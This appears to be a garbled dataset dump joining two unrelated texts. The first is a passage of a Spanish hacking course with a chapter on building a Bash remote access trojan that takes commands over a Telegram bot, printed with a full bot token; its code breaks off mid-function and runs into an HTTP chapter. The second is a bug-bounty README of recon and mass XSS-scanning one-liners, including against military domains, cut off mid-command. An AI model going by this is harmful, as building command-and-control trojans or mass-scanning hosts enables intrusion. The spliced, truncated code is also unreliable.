devuelve un audio leyendo el texto. \n- [Convierte Web a imagen/es o pdf](https://t.me/BetterWebShotBot)\nLe pones la url y te permite obtener una (o varias) imagen o pdf de la web. \n- [Antivirus VirusTotal](https://t.me/VirusTotalAV_bot) \nLe mandas un archivo y comprueba si tiene virus. \n- [Antivirus DrWeb](https://t.me/DrWebBot) \nLe mandas un archivo y comprueba si tiene virus. \n- [BD de Smartphones](https://t.me/SmartphoneDBot) \nIntroduces la marca/modelo y te sale todo el listado de modelos y todas sus especificaciones. \n- [Ejecuta código javascript](https://t.me/injsbot) \nEjecuta el código javascript que le envies y te devuelve el resultado. \n- [Ejecuta código en múltiples lenguajes](https://t.me/RextesterRoBot) \nEjecuta código en muchos lenguajes distintos y te da el resultado. \n- [Descarga Youtube/Tiktok](https://t.me/redownload_bot) \nDescarga videos como video o audio. \n- [Crea códigos QR](https://t.me/qr_livebot)\nIntroduce un texto o url y te genera la imagen QR. \n\n\n_Estos bots están todos operativos y son accesibles gratuitamente en el momento en el que se ha escrito este artículo. Esto puede cambiar si lo lees mucho tiempo después de que se escribiese_\n\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n## Capítulo 24: Telegram RAT\n\n### Qué es un RAT?\nRAT puede hacer referencia a 2 acrónimos en inglés: \n1. Remote Access Tool \n2. Remote Acesss Trojan \n \nUna Remote Access Tool (Herramienta de Acceso Remoto) es un programa informático que permite a un usuario acceder/controlar un dispositivo remoto. Son herramientas creadas para permitir administrar o dar soporte a sistemas sin tener accesso físico a ellos.\n\nUn Remote Access Trojan (Troyano de Acceso Remoto) es un tipo de software malicioso que se oculta en un programa aparentemente legítimo y permite a un atacante acceder y controlar un dispositivo remoto de manera no autorizada. Estos troyanos son utilizados con fines maliciosos, permitiendo a los ciberdelincuentes acceder y controlar dispositivos a distancia sin el conocimiento del usuario. Es decir es una herramienta de acceso remoto a la que se le han incluido funcionalidades que permitan su uso malicioso, como pueden ser la elevación de privilegios, polymorfismo, exfiltración de datos, invisibilidad, persistencia, etc. \n\nSi te suena el término botnet, normalmente las botnets son un montón de sistemas infectados por un RAT que pueden ser controlados simultaneamente. \n\n### Requisitos\n- Cuenta de Telegram\n- Bash\n- jq\n- curl\n\n### Creando el RAT\nEn el [Capítulo 5: Introducción a Bash](#cap%C3%ADtulo-5-introducci%C3%B3n-a-bash) aprendimos un poco sobre el lenguaje Bash, asique será el que vamos a utilizar para crear el bot. \n\nAntes de programar algo, sobre todo si somos inexpertos, es importante definir la lógica y las funcionalidades que queremos que tenga nuestro programa. Para hacer esto podemos usar pseudocódigo o bien el propio idioma español. Esto nos permitirá definir una idea clara de como y que será el programa. \n\nPodemos primero hacer un listado de las funcionalidades: \n- Leer los mensajes de una cuenta Bot de Telegram \n- Borrar los mensajes de la cuenta Bot de Telegram \n- Enviar mensajes a la cuenta de Telegram \n- Sistema de login \n- Usuarios logeados pueden correr comandos en el sistema \n- Usuarios no logeados pueden correr comandos como /help o /login \n \nUna vez tenemos la lista de lo que queremos que haga el programa, podemos escribir como sería el código en español en un lenguaje inventado:\n\n```\n-comentario- VariablesGlobales:\ncrear lista usuariosLogeados\n\n-comentario- Funciones:\nfuncion LeerMensajes\n mensajes = solicitarMensajes a telegram\n retornar mensajes\n\nfuncion BorrarMensajes\n solicitarBorradoDeMensajes a telegram\n\nfuncion EnviarMensaje mensaje_del_bot usuario_x\n enviarMensaje mensaje_del_bot al usuario_x de telegram\n\nfuncion Login usuario_x contrasena_x\n si usuario_x está en la lista\n retornar VERDADERO\n\nfuncion CorrerComandosEnSistema usuario_x comando_a_correr\n si (ComprobarSiUsuarioEnLista usuario_x) igual a VERDADERO\n respuestaDelComando = ejecutar comando_a_correr\n retornar respuestaDelComando\n\n\n-comentario- Código principal:\nbucleInfinito:\n mensaje = LeerMensajes\n\n si mensaje tiene /login\n si login usuario_x contrasena_x igual a VERDADERO\n Añadir usuario_x a la lista de usuariosLogeados\n\n si mensaje tiene hola\n EnviarMensaje \"Hola soy el RAT\" usuario_x\n\n si mensaje tiene /ejecutar_comando\n si (ComprobarSiUsuarioEnLista usuario_x) igual a VERDADERO\n respuestaDelComando = ejecutar comando_a_correr\n EnviarMensaje respuestaDelComando usuario_x\n\n BorrarMensajes\n Esperar 5 segundos\n``` \n \nComo puedes observar el código es bastante sencillo. Esto es lo que sería la lógica principal del programa. Obviamente se omiten pequeños detalles como manejo de errores, obtener el nombre del usuario de los mensajes, etc. Ya que el objetivo de hacer este pseudocódigo es definir la lógica principal/estructura que queremos que tenga nuestro programa. \n\nEl siguiente paso es escribir este mismo código pero en un lenguaje real. En nuestro caso Bash, pero se puede utilizar cualquier otro. \n\n##### Creando el bot de Telegram \nPara poder interactuar con Telegram, lo primero será crear un bot de telegram que guardará los mensajes que le mandemos, y así nosotros podremos acceder a ellos desde el RAT. Como ya vimos en los requisitos necesitamos tener una cuenta de Telegram para poder crear bots. Una vez tienes una cuenta puedes crear un bot en la siguiente url: [https://t.me/BotFather](https://t.me/BotFather), si estás en Android con hacer click ya te abre el chat con BotFather para poder crear tu bot. \n \nUna vez dentro del chat de tg con BotFather le escribirás el comando /newbot para iniciar la creación de un nuevo bot. Te pedirá que escribas el nombre del bot. Puedes ponerle por ejemplo: RAT_De_TuNombre \n \nTras enviarle el nombre de tu bot, te dirá que necesita un nombre de usuario para la cuenta del bot. Es decir, te está pidiendo el @ del bot. Una de las condiciones de las cuentas de bots es que su nombre de cuenta debe terminar por la palabra bot. Asique puedes llamarlo RAT_De_TuNombre_Bot que en mi caso sería RAT_De_Manolo_Bot \n \nSi el nombre es válido, verás un mensaje como:\n```\nDone! Congratulations on your new bot. You will find it at t.me/RAT_De_Manolo_Bot. You can now add a description, about section and profile picture for your bot, see /help for a list of commands. By the way, when you've finished creating your cool bot, ping our Bot Support if you want a better username for it. Just make sure the bot is fully operational before you do this.\n\nUse this token to access the HTTP API:\n5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9\nKeep your token secure and store it safely, it can be used by anyone to control your bot.\n\nFor a description of the Bot API, see this page: https://core.telegram.org/bots/api\n```\n\nEn este mensaje se incluye una url para poder hablar con el bot y un token que debes poner en las peticiones que hagas al bot, por ejemplo para obtener los mensajes que le enviaron al bot. \n \n*IMPORTANTE*: _Este token no debes compartirlo con nadie, ya que se puede utilizar para controlar el bot y por tanto si lo tienes funcionando en tu sistema o en otro, un desconocido que tenga tu token del bot podría también controlar el sistema sin que tu lo sepas._\n\nPodemos probar que todo funciona correctamente con un comando de curl. Abre un chat con el bot usando el enlace que te dio BotFather y envíale el mensaje Hola! \n \nUtiliza el siguiente comando para solicitar los mensajes del bot con curl:\n```bash\ncurl 'https://api.telegram.org/botYOUR_BOT_TOKEN/getUpdates'\n```\n\nObviamente remplaza YOUR_BOT_TOKEN por el token de tu bot. En mi caso sería: \n```bash\ncurl 'https://api.telegram.org/bot5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9/getUpdates'\n```\n\n*NOTA*: _/getUpdates así como otros endpoints de la API de Telegram Bot están publicadas en la web de telegram. [Bot API](https://core.telegram.org/bots/api). Si bajas por la web verás el getUpdates que estoy utilizando, asi como otros que están disposibles_ \n\nSi todo está correcto, verás una respuesta similar a:\n```json\n{\"ok\":true,\"result\":[{\"update_id\":241851273,\n\"message\":{\"message_id\":1,\"from\":{\"id\":827150271,\"is_bot\":false,\"first_name\":\"StringManolo\",\"username\":\"StringManolo\",\"language_code\":\"es\"},\"chat\":{\"id\":167170617,\"first_name\":\"StringManolo\",\"username\":\"StringManolo\",\"type\":\"private\"},\"date\":1662723616,\"text\":\"Hola\"}}]}\n```\n \nEste formato se conoce como JSON y es bastante utilizado por muchos servicios. Con el comando *jq* podremos extraer exactamente lo que necesitemos de la respuesta del bot. Por ejemplo si queremos obtener solo el mensaje:\n```bash\ncurl -s curl 'https://api.telegram.org/bot5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9/getUpdates' | jq .result[0].message.text\n``` \n\nVeremos como resultado el mensaje 'Hola' que le escribimos al bot en el chat. La sintaxis de jq es sencilla de entender, los puntos son para acceder a propiedades (es decir los nombres), y los corchetes son para acceder al mensaje en concreto. Por ejemplo con [0] accedemos al primer mensaje, con [1] accedemos al segundo, con [9] accedemos al décimo, etc. En este caso solo tenemos el de Hola, pero si le envias mas cosas al chat del bot, tendrás mas. \n \nSi espaciamos el JSON podemos ver mejor su estructura visualmente: \n```json\n{\n \"ok\": true,\n \"result\": [\n {\n \"update_id\": 241851273,\n \"message\": {\n \"message_id\": 1,\n \"from\": {\n \"id\": 827150271,\n \"is_bot\": false,\n \"first_name\": \"StringManolo\",\n \"username\": \"StringManolo\",\n \"language_code\": \"es\"\n },\n \"chat\": {\n \"id\": 167170617,\n \"first_name\": \"StringManolo\",\n \"username\": \"StringManolo\",\n \"type\": \"private\"\n },\n \"date\": 1662723616,\n \"text\": \"Hola\"\n }\n },\n\n {\n \"update_id\": 241851274,\n \"message\": {\n \"message_id\": 2,\n \"from\": {\n \"id\": 827150271,\n \"is_bot\": false,\n \"first_name\": \"StringManolo\",\n \"username\": \"StringManolo\",\n \"language_code\": \"es\"\n },\n \"chat\": {\n \"id\": 167170617,\n \"first_name\": \"StringManolo\",\n \"username\": \"StringManolo\",\n \"type\": \"private\"\n },\n \"date\": 1662723640,\n \"text\": \"Otro Mensaje\"\n }\n }\n ]\n}\n```\n\nLe añadí otro mensaje para que veas como queda. \n\n\nPues ahora que ya vemos mas o menos como funciona, lo que haremos es usar Bash para obtener estos mensajes programáticamente, analizarlos y tomar decisiones en base al texto que recibamos, por ejemplo si recibimos el mensaje /saluda podremos obtener el nombre del usuario que nos envió ese mensaje, el id del chat y enviarle un mensaje tal que 'Hola Manolo' al mismo chat que nos envió el mensaje /saluda. Con esta sencilla técnica si detectamos el mensaje '/run ls' podremos ejecutar el comando ls usando Bash y enviarle al chat del usuario la respuesta del comando ls. Así de esta forma es como tener una terminal remota, ya que todos los comandos que le ponemos en el chat de telegram nuestro programa en bash los ejecutará y nos enviará la respuesta. \n \nPues procedamos a implementar en bash nuestra primera función LeerMensajes que hicimos en pseudocódugo en español. _Para programar usaré VIM como editor de texto. Si no lo manejas puedes revisar el_ [Capítulo 6: Uso de VI y de VIM](#cap%C3%ADtulo-6-uso-de-vi-y-de-vim) _o puedes utilizar cualquier otro editor de texto._\n\nCrearé el archivo llamado rat.sh con el siguiente comando:\n```bash\nvim rat.sh\n```\n\n##### Y dentro del archivo haremos la función LeerMensajes:\n```bash\nTOKEN='5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9';\n\nLeerMensajes() {\n local -n referenciaMensajes=$2;\n local comando='curl '\"'\"'https://api.telegram.org/bot';\n comando+=$1; # $TOKEN\n comando+='/getUpdates'\"'\"' --silent';\n referenciaMensajes=$(eval $comando);\n}\n\nLeerMensajes $TOKEN mensajes;\necho $mensajes\n```\n\nExplicación del código: \n- Utilizo una variable para almacenar el token, ya que si lo metes directamente en el url y en el futuro utilizas otro bot, o cambias el token de tu bot tendrías que cambiarlo de todas las urls. En cambio usando la variable TOKEN tan solo hay que cambiarle el token ahí. \n\n- Obtengo una referencia local a la segunda variable que se pase en la llamada a la función (es una técnica para poder rellenar la variable mensajes con lo que queramos) \n\n- Creo un texto tal que curl 'https://.....' después le añado el TOKEN, después el resto de la url. \n\n- Evalúo el texto para ejecutarlo como comando. \n\n- Le asigno a mensajes la respuesta del comando (el JSON). \n\n- Añadí también un código de ejemplo de como se utiliza la función para guardar el JSON en una variable y lo imprimo en consola. \n\n \nSi sales del editor y ejecutas el código con el comando:\n```bash\nbash rat.sh\n```\n\nVerás la misma salida que obteníamos al correr el comando curl en consola solicitando los mensajes. Es decir, la función lo único que hace es guardar en una variable $mensajes la respuesta del comando curl. \n \n##### Para la función BorrarMensajes haremos lo mismo:\n```bash\nultimoId=0;\n\nBorrarMensajes() {\n local -n referenciaMensajes=$2;\n local comando='curl '\"'\"'https://api.telegram.org/bot';\n comando+=$1; # $TOKEN\n comando+='/getUpdates?offset=';\n comando+=$(($ultimoId));\n comando+=''\"'\"' --silent';\n referenciaMensajes=$(eval $comando);\n}\n```\n\nExplicación del código:\n- El código es prácticamente igual que la función LeerMensajes\n- Cambiamos el método del endpoint a /getUpdates?offset=$ultimoId \nPor el resto es lo mismo. Esto lo explican en la documentación de Telegram Bot API. Al pasarle el id de update del JSON se borran automáticamente los mensajes anteriores. El id de update lo verás en el json, en este caso la variable ultimoId es una variable global como TOKEN que modificaremos mas adelante. \n \n##### La siguiente función es la de EnviarMensaje: \n```bash\n# Codifica comillas, guiones, barra invertida y otros caracteres especiales\nCodificarMensaje() {\n local cadena=\"${1}\";\n local tamanhoCadena=${#cadena};\n local codificado=\"\";\n local pos c o;\n\n for (( pos=0 ; pos\n\n\n Example Domain\n\n \n \n \n \n\n\n\n
\n

Example Domain

\n

This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.

\n

More information...

\n
\n\n\n```\n\nComo puedes observar la primera linea nos indica la versión del protocolo con la que nos responde, un número que se conoce como _código de estado_ y una descripción corta en texto con lo que significa ese código _frase de estado_. Por ejemplo 200 nos dice que todo está OK, que en respuesta a GET suele significar que encontró el rescurso que le pedimos (el /index.html). Otro código de respuesta muy conocido es el 404 Not Found (no encontrado que nos suele aparecer cuando solicitamos un recurso que no existe en el servidor. \n \nA partir de ahí también nos responde con cabeceras. Vamos a ver que significa cada una de las cabeceras que nos envió:\n\n- *Age*: Indica cuánto tiempo ha pasado desde que la respuesta fue generada por el servidor (en segundos). \n- *Cache-Control*: Especifica las directivas de control de caché que deben aplicarse tanto a la solicitud como a la respuesta. En este caso, `max-age=604800` indica que el contenido se puede almacenar en caché durante 604800 segundos (7 días). \n- *Content-Type*: Indica el tipo de contenido del cuerpo de la respuesta. En este caso, `text/html; charset=UTF-8` indica que el contenido es HTML con codificación UTF-8. \n- *Date*: Muestra la fecha y hora en que se generó la respuesta. \n- *Etag*: Proporciona una etiqueta que identifica única e individualmente la versión actual del recurso. Se utiliza para la validación de la caché condicional. \n- *Expires*: Indica la fecha y hora en que expira el contenido almacenado en caché. \n- *Last-Modified*: Muestra la fecha y hora en que se modificó por última vez el recurso en el servidor. \n- *Server*: Indica el software del servidor que respondió a la solicitud. \n- *Vary*: Indica qué encabezados de solicitud se utilizaron para determinar la respuesta almacenada en caché. En este caso, `Accept-Encoding` indica que la respuesta puede variar según la codificación de contenido aceptada. \n- *X-Cache*: Proporciona información sobre el estado de la caché en el servidor. `HIT` indica que la respuesta se sirvió desde la caché. \n- *Content-Length*: Indica la longitud del cuerpo de la respuesta en bytes. Mas o menos equivale al número de caracteres que tiene el archivo que le solicitamos. \n \nTras las cabeceras de respuesta se incluye el contenido del archivo solicitado, en este caso es el index.html de la página example.com. Si lo guardas y lo abres en un navegador verás la web de example.com\n\n##### HTTPS\nYa sabes que es HTTP, pero entonces que es HTTPS, otro protocolo? En verdad no, cuando nos referimos a HTTPS nos estamos refieriendo a HTTP pero enviado en un tunel seguro. Si conectamos directamente a un servidor por ejemplo con el comando ncat example.com 80 estamos estableciendo un tunel TCP/IP con el servidor de example.com por el cual mandaremos el mensaje siguiendo el protocolo HTTP. El puerto 80 es el puerto por defecto para el protocolo HTTP sin cifrar, si queremos establecer un canal cifrado usaremos el puerto 443. Por ejemplo:\n```bash\necho 'GET / HTTP/1.1\nHost: example.com\n\n\n' | ncat example.com 443\n``` \n\nSi hacemos esto sin más estaremos enviando una petición HTTP sin cifrar a un tunel que requiere cifrado y el servidor o cerrará el tunel TCP sin respondernos o nos avisará que estamos enviando texto sin cifrar. En el caso concreto de example.com simplemente cierra el tunel y ncat nos avisará con el mensaje: *Ncat: Connection reset by peer.* en español *Ncat: Conexión restablecida por la otra parte*. Es decir, la otra parte de la comunicación (el servidor de example.com) nos cerró la conexión (tunel) porque le enviamos texto sin cifrar en lugar de negociar el cifrado. La parte de negociación del cifrado es un tema complejo que pertenece al protocolo TLS y no tiene que ver con el protocolo HTTP, asique no es algo que corresponda explicar en este capítulo. Si quieres usar un tunel cifrado simplemente añade la flag --ssl al comando ncat y el programa se encargará automáticamente de negociar el cifrado. \n\n```bash\necho 'GET / HTTP/1.1\nHost: example.com\n\n\n' | ncat example.com 443 --ssl\n```\n\nVerás la misma respuesta si utilizas http en el puerto 80 que si utilizas https en el puerto 443, la diferencia es que el mensaje viaja cifrado, esto quiere decir que si alguien te está espiando en el wi-fi en lugar de ver las peticiones tal como tu las escribes verá \"caracteres sin sentido\" (el tráfico cifrado). Asique siempre que puedas utiliza https ya que es lo mismo pero en lugar de usar un tunel sin cifrado, las peticiones y respuestas van cifradas y solo tú y example.com teneis las contraseñas para descifrarlas. \n \nAquí un resumen de lo que pasa cuando utilizas la flag --ssl:\n1. El cliente (ncat) se conecta al servidor en el puerto 443. \n2. El servidor responde con su certificado digital. \n3. El cliente verifica la autenticidad del certificado. \n4. El cliente y el servidor intercambian información para acordar el cifrado y la clave. \n5. Se genera una clave de sesión para cifrar y descifrar los datos. \n6. Una vez establecida la conexión segura, el cliente y el servidor pueden intercambiar datos cifrados. \n\n##### Servidor Web mínimo\nA parte de enviar peticiones a un servidor, podemos crear un servidor mínimo que nos responda a las peticiones, ncat nos sirve para hacer una versión mínima de HTTP. \n\n```bash\n#!/usr/bin/env bash\n\n# Puerto en el que escuchará el servidor web\nPUERTO=8080\n\n# Función para manejar las solicitudes HTTP\nmanejar_solicitud() {\n cat index.html\n}\n\n# Iniciar el servidor web\nwhile true; do\n respuesta=$(manejar_solicitud)\n echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n\\r\\n$respuesta\\r\\n\" | ncat -lk -p $PUERTO\ndone\n```\n\nPuedes guardar este archivo como servidor_web.sh darle permisos y ejecutarlo con el comando: \n\n```bash\nchmod 775 ./servidor_web.sh\n./servidor_web.sh\n```\n\nAhora podrás interactuar con él en el puerto 8080. Como ves en su código lo único que hace es enviar siempre la misma respuesta. Si tienes un archivo index.html te lo enviará en la respuesta. Puedes probar a crear el index.html con el comando: \n\n```bash\necho '

Esta es mi web de ejemplo

' > index.html\n``` \n\nY ahora puedes verla desde el navegador visitando la URL http://localhost:8080 o http://127.0.0.1:8080\n\nTambién puedes usar url o ncat desde otra sesión de la terminal en lugar del navegador.\n\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n\n\n----\n\n\n\n## Capítulo 26: Protocolo DNS\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n\n## Capítulo 27: Servicios Web\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n\n## Capítulo 28: Hosting Gratuitos\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n\n## Capítulo 29: Dominios Gratuitos \n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n## Capítulo 30: Introducción a Programación\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n"}}},{"rowIdx":666,"cells":{"text":{"kind":"string","value":"## 👑 What is KingOfBugBounty Project ? 👑\n\nOur main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..\n\nWant to earn 100 dollars using my code on ocean-digital? \n\n[![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge)\n\nMy course PT-BR = https://ofjaaah.com\n\n## Join Us\n\n[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA)\n[![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah)\n\n## BugBuntu Download \n\n- [BugBuntu](https://sourceforge.net/projects/bugbuntu/)\n- [@bt0s3c](https://twitter.com/bt0s3c)\n- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)\n\n## Special thanks\n\n- [@bt0s3c](https://twitter.com/bt0s3c)\n- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)\n- [@Stokfredrik](https://twitter.com/stokfredrik)\n- [@Jhaddix](https://twitter.com/Jhaddix)\n- [@pdiscoveryio](https://twitter.com/pdiscoveryio)\n- [@TomNomNom](https://twitter.com/TomNomNom)\n- [@jeff_foley](https://twitter.com/@jeff_foley)\n- [@NahamSec](https://twitter.com/NahamSec)\n- [@j3ssiejjj](https://twitter.com/j3ssiejjj)\n- [@zseano](https://twitter.com/zseano)\n- [@pry0cc](https://twitter.com/pry0cc)\n\n## Scripts that need to be installed\n\nTo run the project, you will need to install the following programs:\n\n- [Amass](https://github.com/OWASP/Amass)\n- [Anew](https://github.com/tomnomnom/anew)\n- [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl)\n- [Assetfinder](https://github.com/tomnomnom/assetfinder)\n- [Axiom](https://github.com/pry0cc/axiom)\n- [CF-check](https://github.com/dwisiswant0/cf-check)\n- [Chaos](https://github.com/projectdiscovery/chaos-client)\n- [Dalfox](https://github.com/hahwul/dalfox)\n- [DNSgen](https://github.com/ProjectAnte/dnsgen)\n- [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved)\n- [Findomain](https://github.com/Edu4rdSHL/findomain)\n- [Fuff](https://github.com/ffuf/ffuf)\n- [Gargs](https://github.com/brentp/gargs)\n- [Gau](https://github.com/lc/gau)\n- [Gf](https://github.com/tomnomnom/gf)\n- [Github-Search](https://github.com/gwen001/github-search)\n- [Gospider](https://github.com/jaeles-project/gospider)\n- [Gowitness](https://github.com/sensepost/gowitness)\n- [Hakrawler](https://github.com/hakluke/hakrawler)\n- [HakrevDNS](https://github.com/hakluke/hakrevdns)\n- [Haktldextract](https://github.com/hakluke/haktldextract)\n- [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool)\n- [Httpx](https://github.com/projectdiscovery/httpx)\n- [Jaeles](https://github.com/jaeles-project/jaeles)\n- [Jsubfinder](https://github.com/hiddengearz/jsubfinder)\n- [Kxss](https://github.com/Emoe/kxss)\n- [LinkFinder](https://github.com/GerbenJavado/LinkFinder)\n- [Metabigor](https://github.com/j3ssie/metabigor)\n- [MassDNS](https://github.com/blechschmidt/massdns)\n- [Naabu](https://github.com/projectdiscovery/naabu)\n- [Qsreplace](https://github.com/tomnomnom/qsreplace)\n- [Rush](https://github.com/shenwei356/rush)\n- [SecretFinder](https://github.com/m4ll0k/SecretFinder)\n- [Shodan](https://help.shodan.io/command-line-interface/0-installation)\n- [ShuffleDNS](https://github.com/projectdiscovery/shuffledns)\n- [SQLMap](https://github.com/sqlmapproject/sqlmap)\n- [Subfinder](https://github.com/projectdiscovery/subfinder)\n- [SubJS](https://github.com/lc/subjs)\n- [Unew](https://github.com/dwisiswant0/unew)\n- [WaybackURLs](https://github.com/tomnomnom/waybackurls)\n- [Wingman](https://xsswingman.com/#faq)\n- [Notify](https://github.com/projectdiscovery/notify)\n- [Goop](https://github.com/deletescape/goop)\n- [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson)\n- [GetJS](https://github.com/003random/getJS)\n- [X8](https://github.com/Sh1Yo/x8)\n- [Unfurl](https://github.com/tomnomnom/unfurl)\n- [XSStrike](https://github.com/s0md3v/XSStrike)\n\n\n### .bashrc shortcut.\n\n```bash\nreconjs(){\ngau -subs $1 |grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt\n}\ncert(){\ncurl -s \"[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | anew\n}\nanubis(){\ncurl -s \"[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | anew\n}\n```\n\n### Dalfox scan to bugbounty targets.\n- [Explained command](https://bit.ly/3nnEhCj)\n\n```bash\nxargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'\n```\n\n### Dalfox scan to bugbounty targets.\n- [Explained command](https://bit.ly/324Sr1x)\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @\n```\n\n### Using x8 to Hidden parameters discovery\n- [Explaining command](https://bit.ly/3w48wl8)\n\n```bash\nassetfinder domain | httpx -silent | sed -s 's/$/\\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'\n```\n\n### Extract .js Subdomains\n- [Explaining command](https://bit.ly/339CN5p)\n\n```bash\necho \"domain\" | haktrails subdomains | httpx -silent | getJS --complete | anew JS\necho \"domain\" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1\n```\n\n\n### goop to search .git files.\n- [Explaining command](https://bit.ly/3d0VcY5)\n\n```bash\nxargs -a xss -P10 -I@ sh -c 'goop @'\n```\n\n### Using chaos list to enumerate endpoint\n\n```bash\ncurl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'\n```\n\n### Using Wingman to search XSS reflect / DOM XSS\n\n- [Explaining command](https://bit.ly/3m5ft1g)\n\n```bash\nxargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'\n\n```\n\n### Search ASN to metabigor and resolvers domain\n\n- [Explaining command](https://bit.ly/3bvghsY)\n\n```bash\necho 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\\+\\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'\n\n```\n\n### OneLiners\n\n### Search .json gospider filter anti-burl\n\n- [Explaining command](https://bit.ly/3eoUhSb)\n\n```bash\ngospider -s https://twitch.tv --js | grep -E \"\\.js(?:onp?)?$\" | awk '{print $4}' | tr -d \"[]\" | anew | anti-burl\n\n```\n\n### Search .json subdomain\n\n- [Explaining command](https://bit.ly/3kZydis)\n\n```bash\nassetfinder http://tesla.com | waybackurls | grep -E \"\\.json(?:onp?)?$\" | anew \n```\n\n### SonarDNS extract subdomains\n\n- [Explaining command](https://bit.ly/2NvXRyv)\n\n```bash\nwget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep \".DOMAIN.com\" | jq .name | tr '\" \" \"' \" / \" | tee -a sonar\n```\n\n### Kxss to search param XSS \n\n- [Explaining command](https://bit.ly/3aaEDHL)\n\n```bash\necho http://testphp.vulnweb.com/ | waybackurls | kxss\n```\n\n\n### Recon subdomains and gau to search vuls DalFox\n\n- [Explaining command](https://bit.ly/3aMXQOF)\n\n```bash\nassetfinder testphp.vulnweb.com | gau | dalfox pipe\n```\n\n\n### Recon subdomains and Screenshot to URL using gowitness\n\n- [Explaining command](https://bit.ly/3aKSSCb)\n\n```bash\nassetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' \n```\n\n\n### Extract urls to source code comments\n\n- [Explaining command](https://bit.ly/2MKkOxm)\n\n```bash\ncat urls1 | html-tool comments | grep -oE '\\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' \n```\n\n### Axiom recon \"complete\"\n\n- [Explaining command](https://bit.ly/2NIavul)\n\n```bash\nfindomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr \",\" \" \" | awk '{print $2}' | fff | grep 200 | sort -u \n```\n\n### Domain subdomain extraction \n\n- [Explaining command](https://bit.ly/3c2t6eG)\n\n```bash\ncat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'\n\n```\n\n\n### Search .js using \n\n- [Explaining command](https://bit.ly/362LyQF)\n\n```bash\nassetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E \"\\.js(?:onp?)?$\" | anew\n```\n\n\n### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below.\n\n- [Explaining command](https://bit.ly/3sD0pLv)\n\n```bash\ncat dominios | gau |grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo \"(http|https)://[^/\\\"].*\\.js+\" | sed \"s#\\] \\- #\\n#g\" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c \"echo -e '\\n[URL]: @\\n'; python3 linkfinder.py -i @ -o cli\" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> 